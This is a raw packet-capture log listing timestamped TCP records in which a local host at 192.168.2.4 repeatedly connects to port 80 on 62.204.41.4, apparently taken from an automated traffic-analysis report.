                            Feb 8, 2023 17:37:36.354558945 CET804973462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:36.357598066 CET804973462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:36.358021975 CET4973480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:36.465169907 CET4973480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:36.466037035 CET4973580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:36.526504993 CET804973562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:36.527806044 CET804973462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:36.528059959 CET4973480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:36.528064966 CET4973580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:36.528446913 CET4973580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:36.588812113 CET804973562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:36.591797113 CET804973562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:36.595964909 CET4973580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:36.713036060 CET4973580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:36.714060068 CET4973680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:36.773921013 CET804973562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:36.774128914 CET4973580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:36.776575089 CET804973662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:36.776796103 CET4973680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:36.780328035 CET4973680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:36.845515013 CET804973662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:36.848560095 CET804973662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:36.848727942 CET4973680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:36.978152037 CET4973680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:36.979408026 CET4973780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.040968895 CET804973762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.041017056 CET804973662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.041129112 CET4973780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.041162014 CET4973680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.044349909 CET4973780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.105962038 CET804973762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.111370087 CET804973762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.111526966 CET4973780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.262654066 CET4973780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.263578892 CET4973880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.326127052 CET804973862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.326380014 CET4973880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.326893091 CET804973762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.326997995 CET4973780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.329606056 CET4973880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.390156031 CET804973862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.393659115 CET804973862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.393903017 CET4973880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.510294914 CET4973880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.511286020 CET4973980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.571038008 CET804973862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.571214914 CET4973880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.572616100 CET804973962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.572813988 CET4973980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.573322058 CET4973980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.636580944 CET804973962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.639756918 CET804973962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.639982939 CET4973980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.759032011 CET4973980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.760097980 CET4974080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.820569992 CET804974062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.820630074 CET804973962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.820817947 CET4974080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.821742058 CET4974080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.821744919 CET4973980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.882117033 CET804974062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.884660006 CET804974062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:37.884928942 CET4974080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.995116949 CET4974080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:37.995744944 CET4974180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.057887077 CET804974062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.058007002 CET4974080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.059231997 CET804974162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.059362888 CET4974180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.059834957 CET4974180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.125593901 CET804974162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.128957033 CET804974162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.129050016 CET4974180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.245697021 CET4974180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.246408939 CET4974280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.307882071 CET804974262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.308103085 CET4974280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.309011936 CET804974162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.309138060 CET4974180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.312283039 CET4974280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.371933937 CET804974262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.375379086 CET804974262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.375497103 CET4974280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.477432013 CET4974280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.478305101 CET4974380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.540333986 CET804974262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.540499926 CET4974280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.540832043 CET804974362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.540930986 CET4974380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.542907953 CET4974380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.604501963 CET804974362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.607089996 CET804974362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.607204914 CET4974380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.713944912 CET4974380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.714688063 CET4974480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.777002096 CET804974362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.777156115 CET4974380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.777556896 CET804974462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.777667999 CET4974480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.778107882 CET4974480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.842340946 CET804974462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.845237017 CET804974462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:38.848648071 CET4974480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.970973015 CET4974480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:38.971828938 CET4974580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.032267094 CET804974562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.032562017 CET804974462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.032752037 CET4974480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.032757044 CET4974580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.033149958 CET4974580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.093610048 CET804974562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.097521067 CET804974562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.099001884 CET4974580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.211695910 CET4974580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.212326050 CET4974680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.275091887 CET804974562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.275537968 CET4974580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.276540995 CET804974662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.276842117 CET4974680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.277463913 CET4974680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.339065075 CET804974662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.341696024 CET804974662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.341840982 CET4974680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.451873064 CET4974680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.452812910 CET4974780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.512423038 CET804974762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.513581038 CET804974662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.513766050 CET4974680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.514163017 CET4974780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.514163017 CET4974780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.573585987 CET804974762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.576247931 CET804974762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.579628944 CET4974780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.696490049 CET4974780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.697386980 CET4974880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.758121014 CET804974762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.758611917 CET4974780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.759676933 CET804974862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.759845018 CET4974880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.760373116 CET4974880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.823651075 CET804974862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.827455997 CET804974862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.827572107 CET4974880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.930799961 CET4974880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.931878090 CET4974980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.991660118 CET804974862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.991966009 CET4974880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.994446993 CET804974962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:39.994659901 CET4974980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:39.995475054 CET4974980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.058161974 CET804974962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.062891960 CET804974962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.063077927 CET4974980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.165699959 CET4974980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.166635036 CET4975080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.228018045 CET804975062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.228224039 CET4975080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.228418112 CET804974962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.228498936 CET4974980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.228697062 CET4975080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.290066004 CET804975062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.292813063 CET804975062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.292970896 CET4975080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.401835918 CET4975080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.402980089 CET4975180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.463239908 CET804975062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.463315010 CET804975162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.463403940 CET4975080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.463471889 CET4975180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.464030027 CET4975180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.524379969 CET804975162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.527021885 CET804975162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.527216911 CET4975180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.634215117 CET4975180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.635210037 CET4975280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.697451115 CET804975162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.697609901 CET4975180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.699335098 CET804975262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.699491978 CET4975280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.700037956 CET4975280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.763767958 CET804975262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.766264915 CET804975262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.766438007 CET4975280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.869265079 CET4975280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.870204926 CET4975380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.931206942 CET804975262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.931386948 CET4975280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.931652069 CET804975362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.931762934 CET4975380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.932450056 CET4975380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:40.994023085 CET804975362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.996359110 CET804975362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:40.996465921 CET4975380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.102952003 CET4975380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.103787899 CET4975480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.168056011 CET804975362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.168100119 CET804975462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.168133020 CET4975380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.168185949 CET4975480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.168560982 CET4975480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.232810020 CET804975462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.236617088 CET804975462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.236742020 CET4975480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.355696917 CET4975480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.356638908 CET4975580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.417227030 CET804975562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.417263985 CET804975462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.417382002 CET4975580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.417440891 CET4975480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.418675900 CET4975580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.479334116 CET804975562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.481945038 CET804975562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.482011080 CET4975580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.604788065 CET4975580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.605945110 CET4975680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.668734074 CET804975562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.668869972 CET4975580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.670197964 CET804975662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.670470953 CET4975680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.670964956 CET4975680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.732408047 CET804975662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.734636068 CET804975662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.734745026 CET4975680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.836869001 CET4975680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.837521076 CET4975780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.897305012 CET804975762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.897893906 CET4975780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.898261070 CET804975662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.898386955 CET4975780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.898420095 CET4975680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:41.957901955 CET804975762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.960125923 CET804975762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:41.960218906 CET4975780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.072282076 CET4975780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.073240995 CET4975880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.132085085 CET804975762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.132236004 CET4975780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.134377956 CET804975862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.134893894 CET4975880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.136396885 CET4975880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.197676897 CET804975862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.201607943 CET804975862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.203217030 CET4975880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.306243896 CET4975880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.307218075 CET4975980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.367645979 CET804975862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.368710995 CET804975962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.368839025 CET4975880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.368896961 CET4975980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.369298935 CET4975980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.430638075 CET804975962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.432893991 CET804975962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.436944008 CET4975980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.540524006 CET4975980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.541496992 CET4976080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.601943016 CET804976062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.602060080 CET804975962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.602221012 CET4975980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.602797985 CET4976080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.602797985 CET4976080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.663379908 CET804976062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.665982008 CET804976062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.666125059 CET4976080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.782990932 CET4976080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.783755064 CET4976180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.843530893 CET804976062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.843703985 CET4976080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.844942093 CET804976162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.845104933 CET4976180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.845741987 CET4976180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:42.906997919 CET804976162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.909156084 CET804976162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:42.909446001 CET4976180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.024774075 CET4976180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.025423050 CET4976280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.088011026 CET804976262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.088269949 CET4976280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.088433027 CET804976162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.088531971 CET4976180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.088897943 CET4976280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.150544882 CET804976262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.154521942 CET804976262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.154584885 CET4976280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.259051085 CET4976280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.259871960 CET4976380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.322520018 CET804976362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.322737932 CET804976262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.322737932 CET4976380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.322814941 CET4976280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.325860023 CET4976380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.386413097 CET804976362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.390747070 CET804976362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.390830994 CET4976380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.494215965 CET4976380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.495091915 CET4976480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.554891109 CET804976362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.555073977 CET4976380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.557723999 CET804976462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.557905912 CET4976480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.558404922 CET4976480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.621078014 CET804976462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.624202013 CET804976462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.624413013 CET4976480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.728177071 CET4976480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.728801012 CET4976580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.791001081 CET804976562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.791160107 CET804976462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.791255951 CET4976580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.791299105 CET4976480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.792450905 CET4976580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.853924990 CET804976562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.858036995 CET804976562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:43.858217955 CET4976580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.963191986 CET4976580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:43.964351892 CET4976680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.025057077 CET804976562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.025276899 CET4976580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.027132034 CET804976662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.027298927 CET4976680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.075524092 CET4976680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.138542891 CET804976662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.143132925 CET804976662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.143320084 CET4976680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.259670019 CET4976680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.260637045 CET4976780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.321897984 CET804976762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.322043896 CET4976780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.322176933 CET804976662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.322256088 CET4976680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.322427034 CET4976780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.383528948 CET804976762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.386145115 CET804976762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.386256933 CET4976780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.494321108 CET4976780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.495214939 CET4976880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.555852890 CET804976762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.555963039 CET4976780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.557444096 CET804976862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.557579994 CET4976880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.560978889 CET4976880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.623259068 CET804976862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.625554085 CET804976862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.625658989 CET4976880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.730901003 CET4976880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.731911898 CET4976980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.791498899 CET804976962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.791599035 CET4976980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.792124987 CET4976980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.793344975 CET804976862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.793462038 CET4976880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.851648092 CET804976962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.854747057 CET804976962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:44.854943037 CET4976980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.963285923 CET4976980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:44.964237928 CET4977080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:45.023138046 CET804976962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:45.024089098 CET4976980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:45.025583029 CET804977062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:45.025849104 CET4977080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:45.036009073 CET4977080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:45.097456932 CET804977062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:45.101557016 CET804977062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:45.102091074 CET4977080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:45.216968060 CET4977080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:45.217890024 CET4977180192.168.2.462.204.41.4
